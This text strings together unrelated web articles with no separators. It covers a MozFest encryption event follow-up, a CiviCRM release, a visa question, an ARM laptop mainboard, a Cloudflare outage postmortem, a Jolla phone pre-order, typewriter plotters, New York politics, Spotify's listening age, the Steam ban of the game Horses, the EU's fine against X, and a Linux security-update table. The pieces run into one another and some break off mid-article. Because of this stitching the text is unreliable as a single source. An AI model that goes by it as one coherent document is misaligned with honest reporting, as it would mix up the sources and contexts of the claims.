A follow-up to our Mozilla Festival session on Encryption and Feminism: Reimagining Child Safety Without Surveillance.
By Audrey Hingle
Our MozFest session on Encryption and Feminism: Reimagining Child Safety Without Surveillance was bigger than a one-hour festival slot could contain. The room filled fast, people were turned away at the door, and the Q&A could have gone on twice as long. Many attendees told us afterwards that this is the conversation they’ve been waiting to have. That feminist perspectives on encryption aren’t just welcome, they’re needed. So we’re opening the circle wider and taking it online so more people can join in.
In the room, we heard reflections that reminded us why this work matters. In feedback forms, attendees told us encryption isn’t only a security feature, it’s “part of upholding the rights of kids and survivors too, now let’s prove that to the rest of the world!” Another participant said they left ready to “be a champion of encryption to protect all.” Someone else named what many feel: “More feminist spaces are needed!”
It quickly became clear that this work is collective. It’s about shifting assumptions, building new narratives, and demanding technology that does not treat privacy as optional or as something only privacy hardliners or cryptography experts care about. Privacy is safety, dignity, and a precondition for seeking help. It is necessary to explore identity, form relationships, and grow up. Privacy is a human right.
We also heard calls for clarity and practicality: to reduce jargon, show people what encryption actually does, and push for privacy-preserving features more generally like screenshot protection and sender-controlled forwarding.
Participants also reminded us that encryption must account for disparity and intersectionality. Surveillance is not experienced equally. Some communities never get to “opt in” or consent at all. Feminist principles for encryption must reflect that reality.
And importantly, we heard gratitude for the tone of the session: open, candid, grounded, and not afraid to ask hard questions. “Normalize the ability to have tricky conversations in movement spaces,” someone wrote. We agree. These conversations shouldn’t only happen at conferences, they should live inside policy rooms, product roadmaps, activist communities, parenting forums, classrooms.
So let’s keep going.
🗓️ Feb 10, 4PM GMT, Online
Whether you joined us at MozFest, couldn't make it to Barcelona, or were one of the many who could not get into the room, this session is for you. We are running the event again online so more people can experience the conversation in full. We will revisit the discussion, share insights from the panel, and walk through emerging Feminist Encryption Principles, including the ideas and questions raised by participants.
Speakers will include Chayn's Hera Hussain, Superbloom's Georgia Bullen, Courage Everywhere's Lucy Purdon, UNICEF's Gerda Binder, and IX's Mallory Knodel, Ramma Shahid Cheema and Audrey Hingle.
Help us grow this conversation. Share it with friends and colleagues who imagine a future where children are protected without surveillance and where privacy is not a privilege, but a right.
We hope you’ll join us!
Related: If you care about privacy-preserving messaging apps, Phoenix R&D is inviting feedback through a short survey asking for input on what features matter most for those in at-risk contexts.
New book from IX client Dr. Luca Belli looks at how recommender systems function, how they are measured, and why accountability remains difficult. Luca draws on his experience co-founding Twitter’s ML Ethics, Transparency and Accountability work, contributing to standards at NIST, and advising the European Commission on recommender transparency.
Now available via MEAP on Manning. Readers can access draft chapters as they are released, share feedback directly, and receive the final version when complete. Suitable for researchers, policy teams, engineers, and anyone involved in governance or evaluation of large-scale recommendation systems. It is also written for general readers, with no advanced technical knowledge required, so when you're done with it, hand it to a curious family member who wants to understand how algorithms decide what they see.
Support the Internet Exchange
If you find our emails useful, consider becoming a paid subscriber! You'll get access to our members-only Signal community where we share ideas, discuss upcoming topics, and exchange links. Paid subscribers can also leave comments on posts and enjoy a warm, fuzzy feeling.
Not ready for a long-term commitment? You can always leave us a tip.
United States
Global
What did we miss? Please send us a reply or write to editor@exchangepoint.tech .
Thanks to the hard work of CiviCRM’s incredible community of contributors, CiviCRM version 6.9.0 is now ready to download. This is a regular monthly release that includes new features and bug fixes. Details are available in the monthly release notes .
You are encouraged to upgrade now for the most stable, secure CiviCRM experience:
Users of the CiviCRM Extended Security Releases (ESR) do not need to upgrade. The current version of ESR is CiviCRM 6.4.x.
CiviCRM is community driven and is sustained through code contributions and generous financial support.
We are committed to keeping CiviCRM free and open, forever . We depend on your support to help make that happen. Please consider supporting CiviCRM today .
Big thanks to all our partners , members , ESR subscribers and contributors who give regularly to support CiviCRM for everyone.
AGH Strategies - Alice Frumin; Agileware Pty Ltd - Iris, Justin Freeman; akwizgran; ALL IN APPLI - Guillaume Sorel; Artful Robot - Rich Lott; BrightMinded Ltd - Bradley Taylor; Christian Wach; Christina; Circle Interactive - Dave Jenkins, Rhiannon Davies; CiviCoop - Jaap Jansma, Erik Hommel; CiviCRM - Coleman Watts, Tim Otten, Benjamin W; civiservice.de - Gerhard Weber; CompuCo - Muhammad Shahrukh; Coop SymbioTIC - Mathieu Lutfy, Samuel Vanhove, Shane Bill; cs-bennwas; CSES (Chelmsford Science and Engineering Society) - Adam Wood; Dave D; DevApp - David Cativo; Duncan Stanley White; Freeform Solutions - Herb van den Dool; Fuzion - Jitendra Purohit, Luke Stewart; Giant Rabbit - Nathan Freestone; Greenpeace Central and Eastern Europe - Patrick Figel; INOEDE Consulting - Nadaillac; JacquesVanH; JMA Consulting - Seamus Lee; Joinery - Allen Shaw; Lemniscus - Noah Miller; Makoa - Usha F. Matisson; Megaphone Technology Consulting - Jon Goldberg; MJW Consulting - Matthew Wire; Mosier Consulting - Justin Mosier; Nicol Wistreich; OrtmannTeam GmbH - Andreas Lietz; Progressive Technology Project - Jamie McClelland; Progressive Technology Project - Jamie McClelland; Richard Baugh; Skvare - Sunil Pawar; Sarah Farrell-Graham; Squiffle Consulting - Aidan Saunders; Tadpole Collective - Kevin Cristiano; Wikimedia Foundation - Eileen McNaughton; Wildsight - Lars Sander-Green
Hi Peter, thanks for doing the AMA! I have a Delaware registered LLC (10 years old), I managed to get even an EIN remotely. However, I can't open a bank account remotely and so I have just been paying the registered agent fees and Delaware gov taxes for the LLC all these years. I however, genuinely want to come to the states to open the bank account and actually expand my business into the US. The LLC hasn't really had any meetings/etc. but taxes are paid. How do I use my LLC to apply for a B1/B2 to visit the US?
OR should I just close it and try the normal route? Thanks in advance!
The Framework Laptop 13 has a replaceable mainboard, which means that the processor can be easily upgraded after purchase. While Framework itself only offers Intel and AMD CPUs, a mainboard with a high-performance ARM processor from a third-party manufacturer has now launched.
The Qualcomm Snapdragon X Plus and Snapdragon X Elite have proven that ARM processors have earned a place in the laptop market, as devices like the Lenovo IdeaPad Slim 5 stand out with their long battery life and an affordable price point.
MetaComputing is now offering an alternative to Intel, AMD and the Snapdragon X series. Specifically, the company has introduced a mainboard that can be installed in the Framework Laptop 13 or in a mini PC case. This mainboard is equipped with a CIX CP8180 ARM chipset, which is also found inside the Minisforum MS-R1. This processor has a total of eight ARM Cortex-A720 performance cores, the two fastest of which can hit boost clock speeds of up to 2.6 GHz. Moreover, there are four Cortex-A520 efficiency cores.
Additionally, there’s an ARM Immortalis-G720 GPU with ten cores and an AI accelerator with a performance of 30 TOPS. This chipset is likely slower than the Snapdragon X Elite or a current flagship smartphone chip, but it should still provide enough performance for many everyday tasks. Either way, this mainboard upgrade will mostly be of interest to developers, because early tests show that the SoC already draws about 16 watts at idle, which means battery life will likely be fairly short when combined with the 55 Wh battery of the Framework Laptop 13.
The MetaComputing ARM AI PC Kit is available now at the manufacturer’s official online shop . The base model with 16GB RAM, 1TB SSD and a mini PC case costs $549. The mainboard can be installed in a previously purchased Framework Laptop 13. Users who don’t own a Framework Laptop can order a bundle including the notebook for $999. MetaComputing charges an additional $100 for 32GB RAM. Shipping is free worldwide, but these list prices do not include import fees or taxes.
Hannes Brecher, 2025-12-04 (Update: 2025-12-04)
On December 5, 2025, at 08:47 UTC (all times in this blog are UTC), a portion of Cloudflare’s network began experiencing significant failures. The incident was resolved at 09:12 (~25 minutes total impact), when all services were fully restored.
A subset of customers were impacted, accounting for approximately 28% of all HTTP traffic served by Cloudflare. Several factors needed to combine for an individual customer to be affected, as described below.
The issue was not caused, directly or indirectly, by a cyber attack on Cloudflare’s systems or malicious activity of any kind. Instead, it was triggered by changes being made to our body parsing logic while attempting to detect and mitigate an industry-wide vulnerability disclosed this week in React Server Components.
Any outage of our systems is unacceptable, and we know we have let the Internet down again following the incident on November 18. We will be publishing details next week about the work we are doing to stop these types of incidents from occurring.
The graph below shows HTTP 500 errors served by our network during the incident timeframe (red line at the bottom), compared to unaffected total Cloudflare traffic (green line at the top).
Cloudflare's Web Application Firewall (WAF) provides customers with protection against malicious payloads, allowing them to be detected and blocked. To do this, Cloudflare’s proxy buffers HTTP request body content in memory for analysis. Before today, the buffer size was set to 128KB.
As part of our ongoing work to protect customers using React against a critical vulnerability, CVE-2025-55182 , we started rolling out an increase to our buffer size to 1MB, the default limit allowed by Next.js applications. We wanted to make sure as many customers as possible were protected.
This change was being rolled out using our gradual deployment system, and, as part of this rollout, we identified an increase in errors in one of our internal tools which we use to test and improve new WAF rules. As this was an internal tool, and the fix being rolled out was a security improvement, we decided to disable the tool for the time being as it was not required to serve or protect customer traffic.
Disabling this was done using our global configuration system. This system does not use gradual rollouts but rather propagates changes within seconds to the entire network and is under review following the outage we recently experienced on November 18 .
In the FL1 version of our proxy, under certain circumstances, this latter change caused an error state that resulted in HTTP 500 error codes being served from our network.
As soon as the change propagated to our network, code execution in our FL1 proxy reached a bug in our rules module which led to the following Lua exception:
[lua] Failed to run module rulesets callback late_routing: /usr/local/nginx-fl/lua/modules/init.lua:314: attempt to index field 'execute' (a nil value)
resulting in HTTP code 500 errors being issued.
The issue was identified shortly after the change was applied, and was reverted at 09:12, after which all traffic was served correctly.
Customers that have their web assets served by our older FL1 proxy
AND
had the Cloudflare Managed Ruleset deployed were impacted. All requests for websites in this state returned an HTTP 500 error, with the small exception of some test endpoints such as /cdn-cgi/trace.
Customers that did not have the configuration above applied were not impacted. Customer traffic served by our China network was also not impacted.
Cloudflare’s rulesets system consists of sets of rules which are evaluated for each request entering our system. A rule consists of a filter, which selects some traffic, and an action which applies an effect to that traffic. Typical actions are “block”, “log”, or “skip”. Another type of action is “execute”, which is used to trigger evaluation of another ruleset.
Our internal logging system uses this feature to evaluate new rules before we make them available to the public. A top level ruleset will execute another ruleset containing test rules. It was these test rules that we were attempting to disable.
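To make this structure concrete, here is a purely illustrative Lua sketch of a top-level ruleset whose last rule uses an “execute” action to run a sub-ruleset of test rules. The field names are assumptions chosen for illustration, not the actual configuration schema:

-- Illustrative only: invented field names, not the real configuration format.
local test_ruleset = {
  id = "internal-test-rules",
  rules = {
    { filter = 'http.request.uri.path contains "/login"', action = "log" },
  },
}

local top_level_ruleset = {
  id = "managed-ruleset",
  rules = {
    { filter = 'cf.waf.score lt 20', action = "block" },
    -- The "execute" action triggers evaluation of the referenced sub-ruleset.
    { filter = "true", action = "execute", execute = { ruleset = test_ruleset } },
  },
}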
We have a killswitch subsystem as part of the rulesets system which is intended to allow a rule which is misbehaving to be disabled quickly. This killswitch system receives information from our global configuration system mentioned in the prior sections. We have used this killswitch system on a number of occasions in the past to mitigate incidents and have a well-defined Standard Operating Procedure, which was followed in this incident.
However, we have never before applied a killswitch to a rule with an action of “execute”. When the killswitch was applied, the code correctly skipped the evaluation of the execute action, and didn’t evaluate the sub-ruleset pointed to by it. However, an error was then encountered while processing the overall results of evaluating the ruleset:
if rule_result.action == "execute" then
rule_result.execute.results = ruleset_results[tonumber(rule_result.execute.results_index)]
end
This code expects that, if the ruleset has action=”execute”, the “rule_result.execute” object will exist. However, because the rule had been skipped, the rule_result.execute object did not exist, and Lua returned an error due to attempting to look up a value in a nil value.
This is a straightforward error in the code, which had existed undetected for many years. This type of code error is prevented by languages with strong type systems. In our replacement for this code in our new FL2 proxy, which is written in Rust, the error did not occur.
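For illustration, a minimal sketch of the kind of nil guard that avoids this failure mode in Lua; this is an assumption about how such a check could look, not the actual FL1 fix:

-- Hypothetical guard: only dereference rule_result.execute when it exists,
-- i.e. when the execute action was actually evaluated rather than killswitched.
if rule_result.action == "execute" and rule_result.execute ~= nil then
  rule_result.execute.results = ruleset_results[tonumber(rule_result.execute.results_index)]
end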
We made an unrelated change that caused a similar, longer availability incident two weeks ago on November 18, 2025. In both cases, a deployment to help mitigate a security issue for our customers propagated to our entire network and led to errors for nearly all of our customer base.
We have spoken directly with hundreds of customers following that incident and shared our plans to make changes to prevent single updates from causing widespread impact like this. We believe these changes would have helped prevent the impact of today’s incident but, unfortunately, we have not finished deploying them yet.
We know it is disappointing that this work has not been completed yet. It remains our first priority across the organization. In particular, the projects outlined below should help contain the impact of these kinds of changes:
Enhanced Rollouts & Versioning : Similar to how we slowly deploy software with strict health validation, data used for rapid threat response and general configuration needs to have the same safety and blast mitigation features. This includes health validation and quick rollback capabilities among other things.
Streamlined break glass capabilities: Ensure that critical operations can still be achieved in the face of additional types of failures. This applies to internal services as well as all standard methods of interaction with the Cloudflare control plane used by all Cloudflare customers.
"Fail-Open" Error Handling: As part of the resilience effort, we are replacing the incorrectly applied hard-fail logic across all critical Cloudflare data-plane components. If a configuration file is corrupt or out-of-range (e.g., exceeding feature caps), the system will log the error and default to a known-good state or pass traffic without scoring, rather than dropping requests. Some services will likely give the customer the option to fail open or closed in certain scenarios. This will include drift-prevention capabilities to ensure this is enforced continuously.
Before the end of next week we will publish a detailed breakdown of all the resiliency projects underway, including the ones listed above. While that work is underway, we are locking down all changes to our network in order to ensure we have better mitigation and rollback systems before we begin again.
These kinds of incidents, and how closely they are clustered together, are not acceptable for a network like ours. On behalf of the team at Cloudflare we want to apologize for the impact and pain this has caused again to our customers and the Internet as a whole.
| Time (UTC) | Status | Description |
|---|---|---|
| 08:47 | INCIDENT start | Configuration change deployed and propagated to the network |
| 08:48 | Full impact | Change fully propagated |
| 08:50 | INCIDENT declared | Automated alerts |
| 09:11 | Change reverted | Configuration change reverted and propagation start |
| 09:12 | INCIDENT end | Revert fully propagated, all traffic restored |
A successor to the iconic original Jolla Phone from 2013, brought to 2026 with modern specs and honoring the Jolla heritage design. And faster, smoother, more capable than the current Jolla C2.
A phone you can actually daily-drive. Still Private. Still Yours.
Over the past months, Sailfish OS community members voted on what the next Jolla device should be: its key characteristics, specifications and features.
Based on community voting and real user needs, this device has only one mission:
Put control back in your hands.
Made as a thank-you to early supporters
Sailfish OS is proven to outlive mainstream support cycles. Long-term OS support, guaranteed for a minimum of 5 years. Incremental updates, and no forced obsolescence.
Mainstream phones send vast amounts of background data. A common Android phone sends megabytes of data per day to Google even if the device is not used at all.
Sailfish OS stays silent unless you explicitly allow connections.
DIT: DO IT TOGETHER
It’s a community mission.
Every pre-order helps make production a reality.
Technical specification subject to final confirmation upon final payment and manufacturing. Minor alterations may apply.
Because this is a community-funded device, we need committed pre-orders to turn the designs into a full product program and to commit to ordering the first production batch. If we reach 2,000 units, we start the full product program. If not, you get a full refund.
Yes. Fully.
The final price of the product is not set yet, but we estimate it will settle between 599€ and 699€ (incl. your local VAT). The final price depends on the confirmation of the final specification and the Bill-of-Materials, which happens in due course during the product program. Memory component prices in particular have seen exceptionally high volatility this year.
By pre-ordering you confirm your special price of total 499€.
Yes.
It is real. Definition and real electro-mechanical design is underway, based on the community voting. To turn the designs into a full product program and commit to ordering the first batch, we need a minimum of 2,000 committed pre-orders.
Once the manufacturing pathway is confirmed at 2,000 pre-orders.
Yes, there will be. We’ll make those available in due course during the project.
Estimated by the end of 1H/2026.
Yes, we will design the cellular band configuration to enable global travelling as much as possible, including e.g. roaming in the U.S. carrier networks.
The initial sales markets are the EU, UK, Switzerland and Norway. Entering other markets, such as the U.S. and Canada, will be decided in due course based on potential interest from those areas.
We will design the cellular band configuration to enable potential future markets, including major U.S. carrier networks.
Did you know there were typewriters that used ball point pens to draw not just text but also graphics? I’ve collected several of these over the years. Read on to discover a world that you didn’t know existed.
Typewriter plotters could act as a normal typewriter in that you could type on the keys and have the text printed on the page. The difference is that they used a tiny ball point pen to “draw” the text, character by character, onto the page. It’s mesmerizing to watch! Many also included the ability to print graphs and bar charts, although in practice it was likely cumbersome. In addition, some models had the ability to connect to a computer to print text or even custom graphics.
Panasonic made three models. The top-shelf model was the RK-P400C Penwriter, which included a built-in RS-232 port for computer control. It also came with a white pen for error correcting.
Here’s a video of the Panasonic RK-P400C Penwriter typewriter plotter drawing a design under computer control via RS-232. The manual is available from Archive.org.
Mona Triangles on a Panasonic RK-P400C typewriter plotter.
A lower-end model was the Panasonic RK-P440 Penwriter. It had a computer input but required the K100 external interface. Otherwise it was functionally the same: it draws text as well as business graphics with 4-color ballpoint pens, and is portable using 6 C batteries.
The Panasonic K-100 interface box connected to the typewriter via a DE-9 port on the side and connected to your computer via either DB-25 RS-232 or Centronics parallel.
Here’s a video of the Panasonic RK-P400 Penwriter plotting the demo page using four ballpoint pens.
Panasonic also had the basic RK-P200C Penwriter which removed any computer control but kept the ability to do standalone business graphics. Pic from eBay.
There were other ballpoint pen based typewriters, such as this Silver Reed EB50. It draws text and business graphics too, but this one has a parallel port to act as a plotter. I added support for it to my workflow and it’s very good.
Here’s a video of the Silver Reed Colour PenGraph EB50 plotting Schotter. I’ll admit it’s strange seeing this on something with a keyboard.
Smith Corona sold the Graphtext 90 . No computer control. Same pens and also ran on batteries.
Not to be left out, Brother offered the Type-a-Graph BP-30 . Pics from eBay— there’s usually a lot of these for sale.
Even Sears got into the game with the LXI Type-O-Graph (likely by rebranding the Brother Type-a-Graph; they look the same). Mine has a flaw in the print head mechanism.
Adding to the oddware with built-in pen plotters, there was even a calculator with a tiny plotter. This is the Sharp EL-7050 calculator with a built-in plotter printer. It could act as a usual printing calculator, but it could also draw graphs and pie charts of data sets.
Here’s a video of the Sharp EL-7050 calculator printing the powers of 2.
And here’s the Sharp EL-7050 calculator plotting the graph.
Yamaha added a pen plotter to one of their music keyboards, the Yamaha MP-1. The idea was you’d compose music on the keyboard and it would plot the notes on paper as you played. The reality is the plotter was so much slower than your playing that it would take forever to catch up. It also wasn’t great at quantization, so the notes were likely not what you’d expect.
Many small computers in the 1980s also had plotters available like the Commodore 1520 and the Atari 1020 . They used 4” wide paper and the same pens.
Some “slabtops” had built in pen plotters like the Casio PB-700 , Radio Shack Tandy PC-2 , and Sharp PC-2500 .
All of the typewriter models used the same ball point pens in four colors (black, red, green, blue), were portable with a built-in handle, and could run on batteries. They also likely all used the same plotter mechanisms, made by Alps.
The pens are rather scarce now; mostly all that remains is NOS (new old stock), with some exceptions for a couple of German companies that make replacements for medical equipment that happen to fit.
These pen typewriters were sold during the mid 1980s. In PC World magazine July 1985, the Panasonic RK-P400C retailed for $350.
Zohran Mamdani has an ambitious agenda. What does he need to do immediately during his first 100 days in office to make his promises a reality? And what can his administration do to make life better for New York City residents, right from the jump? Over the next two weeks, Hell Gate will be answering those questions.
First up, a look at his plans for universal free child care.
Zohran Mamdani has consistently said that universal, free child care will be his number one priority when he comes into office as mayor. It is the campaign pledge that has garnered the most vocal support from Governor Kathy Hochul. But it’s also the largest and most complicated undertaking he promised, and the one that comes with the biggest price tag – a cost that Mamdani will need state support to cover. If he wants to deliver on child care, he'll have to position himself to be ready to get to work as soon as he's in office—and to tackle multiple challenges at once.
The first step, multiple experts and advocates said, will have to be to fix what Eric Adams broke. "You can't build a new system on a broken foundation," said Emmy Liss, an independent early childhood consultant who worked on pre-K and 3K under Bill de Blasio.
“Age is just a number. So don’t take this personally.” Those words were the first inkling I had that I was about to receive some very bad news.
I woke up on Wednesday with a mild hangover after celebrating my 44th birthday. Unfortunately for me, this was the day Spotify released “Spotify Wrapped”, its analysis of (in my case) the 4,863 minutes I had spent listening to music on its platform over the past year. And this year, for the first time, they are calculating the “listening age” of all their users.
“Taste like yours can’t be defined,” Spotify’s report informed me, “but let’s try anyway … Your listening age is 86.” The numbers were emblazoned on the screen in big pink letters.
It took a long time for my 13-year-old daughter (listening age: 19) and my 46-year-old husband (listening age: 38) to stop laughing at me. Where did I go wrong, I wondered, feeling far older than 44.
But it seems I’m not alone. “Raise your hand if you felt personally victimised by your Spotify Wrapped listening age,” wrote one user on X. Another post , with a brutal clip of Judi Dench shouting “you’re not young” at Cate Blanchett, was liked more than 26,000 times. The 22-year-old actor Louis Partridge best mirrored my reaction when he shared his listening age of 100 on Instagram stories with the caption: “uhhh”.
“Rage bait” – defined as “online content deliberately designed to elicit anger or outrage” in order to increase web traffic – is the Oxford English Dictionary’s word of the year. And to me, that cheeky little message from Spotify, warning me not to take my personalised assessment of my personal listening habits personally, seemed a prime example.
“How could I have a listening age of 86?” I raged to my family and friends, when the artist I listened to the most this year was 26-year-old Sabrina Carpenter? Since I took my daughter to Carpenter’s concert at Hyde Park this summer, I have spent 722 minutes listening to her songs, making me “a top 3% global fan”.
The only explanation Spotify gave for my listening age of 86 was that I was “into music of the late 50s” this year. But my top 10 most-listened to songs were all released in the past five years and my top five artists included Olivia Dean and Chappell Roan (who released their debut albums in 2023).
Admittedly, Ella Fitzgerald is in there too. But her music is timeless, I raged; surely everyone listens to Ella Fitzgerald? “I don’t,” my daughter said, helpfully. “I don’t,” added my husband.
It’s also true that I occasionally listen to folk music from the 50s and 60s – legends such as Pete Seeger, Bob Dylan and Joan Baez. But when I analysed my top 50 “most listened to” songs, almost all of them (80%) were released in the last five years.
What’s particularly enraging is that Spotify knows my taste is best described as “eclectic” – because that’s how Spotify has described it to me. I have apparently listened to 409 artists in 210 music genres over the past year.
None of it makes sense, until you see the extent to which inciting rage in users like me is paying off for Spotify: in the first 24 hours, this year’s Wrapped campaign had 500 million shares on social media, a 41% increase on last year.
According to Spotify, listening ages are based on the idea of a “reminiscence bump”, which they describe as “the tendency to feel most connected to the music from your younger years”. To figure this out, they looked at the release dates of all the songs I played this year, identified the five-year span of music that I engaged with more than other listeners my age and “playfully” hypothesised that I am the same age as someone who engaged with that music in their formative years.
In other words, no matter how old you are, the more unusual and idiosyncratic and out of step your musical taste is compared with your peers, the more likely it is that Spotify will poke fun at some of the music you enjoy listening to.
But now that I understand this, rather than rising to the bait, I know exactly what to do. I walk over to my dusty, ancient CD player. I insert an old CD I bought when I was a teenager. I turn the volume up to max. And then I play one of my favourite songs, a classic song that everyone who has a listening age of 86 or over will know, like I do, off by heart: You Make Me Feel So Young by Ella Fitzgerald.
O n 25 November, award-winning Italian developer Santa Ragione, responsible for acclaimed titles such as MirrorMoon EP and Saturnalia, revealed that its latest project, Horses , had been banned from Steam - the largest digital store for PC games. A week later, another popular storefront, Epic Games Store, also pulled Horses, right before its 2 December launch date. The game was also briefly removed from the Humble Store, but was reinstated a day later.
The controversy has helped the game rocket to the top of the digital stores that are selling it, namely itch.io and GOG. But the question remains – why was it banned? Horses certainly delves into some intensely controversial topics (a content warning at the start details, “physical violence, psychological abuse, gory imagery, depiction of slavery, physical and psychological torture, domestic abuse, sexual assault, suicide, and misogyny”) and is upsetting and unnerving.
The plot is fairly simple, though it turns dark fast. You play as Anselmo, a 20-year-old Italian man sent to spend the summer working on a farm to build character. It’s revealed almost immediately (so fast in fact, that I let out a surprised “Ha!”) that the farm Anselmo has been sent to is not a normal one. The “horses” held there are not actually horses, but nude humans wearing horse heads that appear to be permanently affixed.
Your job is to tend to the garden, the “horses” and the “dog” (who is a human wearing a dog head). Anselmo performs menial, frustratingly slow everyday tasks across Horses’ three-ish hour runtime, like chopping wood and picking vegetables. These monotonous tasks are, however, interspersed with horrible and unsettling jobs. On day one, you find a “horse” body hanging from a tree and have to help the farmer bury it.
It’s disturbing, yes, but Horses doesn’t show most of these horrors playing out, and when it does, the simplistic, crude graphics dull its edges (when you encounter the farmer whipping a human “horse” and have to throw hydrogen peroxide on her back, the marks crisscrossing her skin are blurry and unreal).
The “horses’” genitals and breasts are blurred out. The enslaved are forbidden from fornicating, but you’ll find that they do that anyway (a simplistic, animalistic depiction of sex), and though you’re forced to “tame” them by putting them back in their pen, it’s just a button press to interact, with no indication of what you’ve actually done to them.
Valve, the company that owns Steam, told PC Gamer that Horses’ content was reviewed back in 2023. “After our team played through the build and reviewed the content, we gave the developer feedback about why we couldn’t ship the game on Steam, consistent with our onboarding rules and guidelines,” the statement read. “A short while later the developer asked us to reconsider the review, and our internal content review team discussed that extensively and communicated to the developer our final decision that we were not going to ship the game on Steam.”
According to IGN , Epic Games Store told developer Santa Ragione: “We are unable to distribute Horses on the Epic Games Store because our review found violations of the Epic Games Store Content Guidelines, specifically the ‘Inappropriate Content’ and ‘Hateful or Abusive Content’ policies.” Santa Ragione alleges that “no specifics on what content was at issue were provided.”
Horses’ gameplay is grotesque, not gratuitous. The horror is psychological and lies in the incongruity of performing menial tasks in a veritable hellscape, while having no idea why any of this is going on. There is barely any sound aside from the constant whirring of a film camera (the game is presented like a mostly silent Italian arthouse film), super-up-close shots of mouths moving as they talk or chew, unsettling character models, the occasional cut to a real-life shot of water pouring in a glass or slop filling up a dog bowl.
There is no explicit gore or violence. You are uncomfortable, frustrated and unnerved throughout, and the horrors of humanity are on full display, but nothing ever threatens to upend your lunch. It is an interesting meditation on violence and power dynamics, but it is by no means a shocking or radical game. The conversation that has ignited around it – about video games as art and the censorship of art – is proving to be more profound than the actual content of the game.
The European Commission has fined X €120 million ($140 million) for violating transparency obligations under the Digital Services Act (DSA).
This is the first non-compliance ruling under the DSA, a set of rules adopted in 2022 that requires platforms to remove harmful content and protect users across the European Union.
The fine was issued following a two-year investigation into the platform formerly known as Twitter to determine whether the social network violated the DSA regarding the effectiveness of measures to combat information manipulation and the dissemination of illegal content. The commission's preliminary findings were shared with X in July 2024.
Regulators found that X had breached transparency requirements through its misleading 'blue checkmark' system for 'verified accounts,' its opaque advertising database, and its blocking of researchers' access to public data.
The commission said that X's checkmark misleads users because accounts can purchase the badge without meaningful identity verification. This deceptive design also makes it challenging to assess account authenticity, increasing exposure to fraud and manipulation.
"This deception exposes users to scams, including impersonation frauds, as well as other forms of manipulation by malicious actors," the commission noted. "While the DSA does not mandate user verification, it clearly prohibits online platforms from falsely claiming that users have been verified, when no such verification took place."
X also failed to maintain a transparent advertising repository, as the platform's ad database lacks the accessibility features mandated by the DSA and imposes excessive processing delays that hinder efforts to detect scams, false advertising, and coordinated influence campaigns. It also set up unnecessary barriers that block researchers from accessing public platform data needed to study systemic risks facing European users.
"Deceiving users with blue checkmarks, obscuring information on ads and shutting out researchers have no place online in the EU. The DSA protects users. The DSA gives researchers the way to uncover potential threats," said Henna Virkkunen, the bloc's executive vice president for tech sovereignty.
"The DSA restores trust in the online environment. With the DSA's first non-compliance decision, we are holding X responsible for undermining users' rights and evading accountability."
The commission said that X now has 60 working days to address the blue checkmark violations and 90 days to submit action plans for fixing the research access and advertising issues, and added that failure to comply could trigger additional periodic penalties.
X was designated as a Very Large Online Platform (VLOP) under the EU's DSA on 25 April 2023, following its announcement that it had reached over 45 million monthly active users in the EU.
The Hell Gate Podcast is the best way to start your freezing weekend! A fresh episode will drop later today. Listen here , or wherever you get your podcasts
In congressional districts around the city , primary battles are shaping up, pitting moderates against the left. Then there's Representative Nydia Velázquez's Brooklyn and Queens district, where the fight will be…left vs. further left.
The district lies at the heart of the " Commie Corridor ," encompassing neighborhoods including Williamsburg, Greenpoint, Ridgewood, and Bushwick. Velázquez announced last month that she would step down, taking the city's political class by surprise because in Congress, bowing out at the age of 72 is considered early retirement.
Brooklyn Borough President Antonio Reynoso kicked off his campaign for the seat on Thursday, the first candidate to formally enter the race. The Democratic Socialists of America are expected to put up their own candidate and make a strong play for the district, which is one of their best shots to pick up a congressional seat next year.
"The fight must continue. And I'm ready to step up," Reynoso said in a launch video , filmed mostly in Spanish on the south side of Williamsburg where he grew up.
Reynoso is firmly in the progressive wing of the Democratic Party, but not a DSA member.
| Dist. | ID | Release | Package | Date |
|---|---|---|---|---|
| AlmaLinux | ALSA-2025:22012 | 10 | buildah | 2025-12-05 |
| AlmaLinux | ALSA-2025:22363 | 8 | firefox | 2025-12-05 |
| AlmaLinux | ALSA-2025:22417 | 8 | gimp:2.8 | 2025-12-05 |
| AlmaLinux | ALSA-2025:22668 | 8 | go-toolset:rhel8 | 2025-12-05 |
| AlmaLinux | ALSA-2025:20994 | 10 | ipa | 2025-12-05 |
| AlmaLinux | ALSA-2025:21038 | 10 | kea | 2025-12-05 |
| AlmaLinux | ALSA-2025:21931 | 10 | kernel | 2025-12-05 |
| AlmaLinux | ALSA-2025:22388 | 8 | kernel | 2025-12-05 |
| AlmaLinux | ALSA-2025:22387 | 8 | kernel-rt | 2025-12-05 |
| AlmaLinux | ALSA-2025:21036 | 10 | pcs | 2025-12-05 |
| AlmaLinux | ALSA-2025:22361 | 10 | qt6-qtquick3d | 2025-12-05 |
| AlmaLinux | ALSA-2025:22394 | 10 | qt6-qtsvg | 2025-12-05 |
| AlmaLinux | ALSA-2025:22660 | 9 | systemd | 2025-12-04 |
| AlmaLinux | ALSA-2025:21936 | 10 | valkey | 2025-12-05 |
| Debian | DSA-6072-1 | stable | chromium | 2025-12-04 |
| Debian | DSA-6071-1 | stable | unbound | 2025-12-04 |
| Fedora | FEDORA-2025-fc872e9426 | F42 | CuraEngine | 2025-12-05 |
| Fedora | FEDORA-2025-19c65f1d15 | F43 | CuraEngine | 2025-12-05 |
| Fedora | FEDORA-2025-9831accfe9 | F42 | alexvsbus | 2025-12-05 |
| Fedora | FEDORA-2025-673ec8d684 | F43 | alexvsbus | 2025-12-05 |
| Fedora | FEDORA-2025-67511a59e3 | F41 | fcgi | 2025-12-05 |
| Fedora | FEDORA-2025-d7c1457e7e | F42 | fcgi | 2025-12-05 |
| Fedora | FEDORA-2025-93042e260c | F43 | fcgi | 2025-12-05 |
| Fedora | FEDORA-2025-6a43695048 | F42 | libcoap | 2025-12-05 |
| Fedora | FEDORA-2025-d408d76c4a | F43 | libcoap | 2025-12-05 |
| Fedora | FEDORA-2025-3075610004 | F41 | python-kdcproxy | 2025-12-05 |
| Fedora | FEDORA-2025-068c570cbf | F42 | python-kdcproxy | 2025-12-05 |
| Fedora | FEDORA-2025-3f9b87b0e7 | F43 | python-kdcproxy | 2025-12-05 |
| Fedora | FEDORA-2025-e72c726192 | F42 | texlive-base | 2025-12-05 |
| Fedora | FEDORA-2025-7c5b6a3bcb | F43 | texlive-base | 2025-12-05 |
| Fedora | FEDORA-2025-f0df882417 | F42 | timg | 2025-12-05 |
| Fedora | FEDORA-2025-d2b7d94014 | F43 | timg | 2025-12-05 |
| Fedora | FEDORA-2025-e72c726192 | F42 | xpdf | 2025-12-05 |
